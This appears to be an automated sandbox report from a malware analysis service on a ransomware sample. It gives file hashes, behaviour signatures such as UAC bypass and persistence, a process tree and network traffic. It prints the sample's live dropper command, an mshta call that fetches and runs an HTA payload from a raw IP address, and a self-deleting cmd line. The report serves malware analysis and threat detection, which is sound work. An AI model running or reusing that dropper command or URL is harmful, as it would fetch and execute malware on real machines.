Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    36s
  • max time network
    69s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    07/11/2022, 10:24 UTC

Errors

Reason
Machine shutdown

General

  • Target

    Trojan-Ransom.Win32.Blocker.exe

  • Size

    1.0MB

  • MD5

    985ee7dc0de6c5081bf40ba08b93d37b

  • SHA1

    9386445adf364543c10c8f11cef54cfcd4fdd54f

  • SHA256

    4b68fd89f8a1fc7eea3c478c74c0677e280a94410906e85eb715a65dad31623c

  • SHA512

    ee5210ed05280eb101df79b6e0044c85fd7f222f6c0e8b25998bbfecadf6813276c35b42d661fe6d7739e94c249c3975941d35ee4d2ad48f99485b778e9a71ee

  • SSDEEP

    24576:gljS8/Ns4q86Oh1Jp9cAnlwDUctAaxu19GroaJqlZJhUr:x8u4q8xXTeAnEUc6CuWroaJqFhUr

Malware Config

Extracted

Language
hta
Source
1
mshta.exe "http://93.115.82.248/?0=1&1=0&2=9&3=i&4=7601&5=1&6=1111&7=fbwicfagwq"
URLs
hta.dropper

http://93.115.82.248/?0=1&1=0&2=9&3=i&4=7601&5=1&6=1111&7=fbwicfagwq

Signatures

  • UAC bypass 3 TTPs 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Sets file execution options in registry 2 TTPs 12 IoCs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • System policy modification 1 TTPs 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Blocker.exe
    "C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Blocker.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:940
    • C:\Users\Admin\AppData\Roaming\guard-kgch.exe
      C:\Users\Admin\AppData\Roaming\guard-kgch.exe
      2⤵
      • UAC bypass
      • Executes dropped EXE
      • Sets file execution options in registry
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • System policy modification
      PID:1748
      • C:\Windows\SysWOW64\mshta.exe
        mshta.exe "http://93.115.82.248/?0=1&1=0&2=9&3=i&4=7601&5=1&6=1111&7=fbwicfagwq"
        3⤵
          PID:980
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\TROJAN~1.EXE" >> NUL
        2⤵
        • Deletes itself
        PID:1816
    • C:\Windows\system32\LogonUI.exe
      "LogonUI.exe" /flags:0x0
      1⤵
        PID:824
      • C:\Windows\system32\LogonUI.exe
        "LogonUI.exe" /flags:0x1
        1⤵
          PID:2000

        Network

        • flag-us
          DNS
          checkip.dyndns.org
          guard-kgch.exe
          Remote address:
          8.8.8.8:53
          Request
          checkip.dyndns.org
          IN A
          Response
          checkip.dyndns.org
          IN CNAME
          checkip.dyndns.com
          checkip.dyndns.com
          IN A
          132.226.247.73
          checkip.dyndns.com
          IN A
          132.226.8.169
          checkip.dyndns.com
          IN A
          193.122.6.168
          checkip.dyndns.com
          IN A
          158.101.44.242
          checkip.dyndns.com
          IN A
          193.122.130.0
        • flag-br
          GET
          http://checkip.dyndns.org/
          guard-kgch.exe
          Remote address:
          132.226.247.73:80
          Request
          GET / HTTP/1.1
          User-Agent: Mozilla/4.0
          Host: checkip.dyndns.org
          Response
          HTTP/1.1 200 OK
          Date: Mon, 07 Nov 2022 10:25:46 GMT
          Content-Type: text/html
          Content-Length: 104
          Connection: keep-alive
          Cache-Control: no-cache
          Pragma: no-cache
        • 93.184.220.29:80
          46 B
          40 B
          1
          1
        • 204.79.197.200:443
          40 B
          1
        • 132.226.247.73:80
          http://checkip.dyndns.org/
          http
          guard-kgch.exe
          299 B
          405 B
          5
          3

          HTTP Request

          GET http://checkip.dyndns.org/

          HTTP Response

          200
        • 8.8.8.8:53
          checkip.dyndns.org
          dns
          guard-kgch.exe
          64 B
          176 B
          1
          1

          DNS Request

          checkip.dyndns.org

          DNS Response

          132.226.247.73
          132.226.8.169
          193.122.6.168
          158.101.44.242
          193.122.130.0

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\guard-kgch.exe

          Filesize

          1.0MB

          MD5

          985ee7dc0de6c5081bf40ba08b93d37b

          SHA1

          9386445adf364543c10c8f11cef54cfcd4fdd54f

          SHA256

          4b68fd89f8a1fc7eea3c478c74c0677e280a94410906e85eb715a65dad31623c

          SHA512

          ee5210ed05280eb101df79b6e0044c85fd7f222f6c0e8b25998bbfecadf6813276c35b42d661fe6d7739e94c249c3975941d35ee4d2ad48f99485b778e9a71ee

        • C:\Users\Admin\AppData\Roaming\guard-kgch.exe

          Filesize

          1.0MB

          MD5

          985ee7dc0de6c5081bf40ba08b93d37b

          SHA1

          9386445adf364543c10c8f11cef54cfcd4fdd54f

          SHA256

          4b68fd89f8a1fc7eea3c478c74c0677e280a94410906e85eb715a65dad31623c

          SHA512

          ee5210ed05280eb101df79b6e0044c85fd7f222f6c0e8b25998bbfecadf6813276c35b42d661fe6d7739e94c249c3975941d35ee4d2ad48f99485b778e9a71ee

        • \Users\Admin\AppData\Roaming\guard-kgch.exe

          Filesize

          1.0MB

          MD5

          985ee7dc0de6c5081bf40ba08b93d37b

          SHA1

          9386445adf364543c10c8f11cef54cfcd4fdd54f

          SHA256

          4b68fd89f8a1fc7eea3c478c74c0677e280a94410906e85eb715a65dad31623c

          SHA512

          ee5210ed05280eb101df79b6e0044c85fd7f222f6c0e8b25998bbfecadf6813276c35b42d661fe6d7739e94c249c3975941d35ee4d2ad48f99485b778e9a71ee

        • \Users\Admin\AppData\Roaming\guard-kgch.exe

          Filesize

          1.0MB

          MD5

          985ee7dc0de6c5081bf40ba08b93d37b

          SHA1

          9386445adf364543c10c8f11cef54cfcd4fdd54f

          SHA256

          4b68fd89f8a1fc7eea3c478c74c0677e280a94410906e85eb715a65dad31623c

          SHA512

          ee5210ed05280eb101df79b6e0044c85fd7f222f6c0e8b25998bbfecadf6813276c35b42d661fe6d7739e94c249c3975941d35ee4d2ad48f99485b778e9a71ee

        • memory/824-72-0x000007FEFBA81000-0x000007FEFBA83000-memory.dmp

          Filesize

          8KB

        • memory/940-66-0x00000000002E0000-0x000000000033F000-memory.dmp

          Filesize

          380KB

        • memory/940-57-0x0000000003230000-0x0000000003234000-memory.dmp

          Filesize

          16KB

        • memory/940-55-0x0000000000400000-0x000000000058A000-memory.dmp

          Filesize

          1.5MB

        • memory/940-65-0x0000000000400000-0x000000000058A000-memory.dmp

          Filesize

          1.5MB

        • memory/940-54-0x0000000075521000-0x0000000075523000-memory.dmp

          Filesize

          8KB

        • memory/940-56-0x00000000002E0000-0x000000000033F000-memory.dmp

          Filesize

          380KB

        • memory/1748-67-0x0000000000400000-0x000000000058A000-memory.dmp

          Filesize

          1.5MB

        • memory/1748-68-0x0000000001DD0000-0x0000000001E2F000-memory.dmp

          Filesize

          380KB

        • memory/1748-70-0x0000000000400000-0x000000000058A000-memory.dmp

          Filesize

          1.5MB

        • memory/1748-71-0x0000000001DD0000-0x0000000001E2F000-memory.dmp

          Filesize

          380KB

        • memory/1748-73-0x0000000000400000-0x000000000058A000-memory.dmp

          Filesize

          1.5MB

        • memory/1748-74-0x0000000001DD0000-0x0000000001E2F000-memory.dmp

          Filesize

          380KB

        We care about your privacy.

        This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.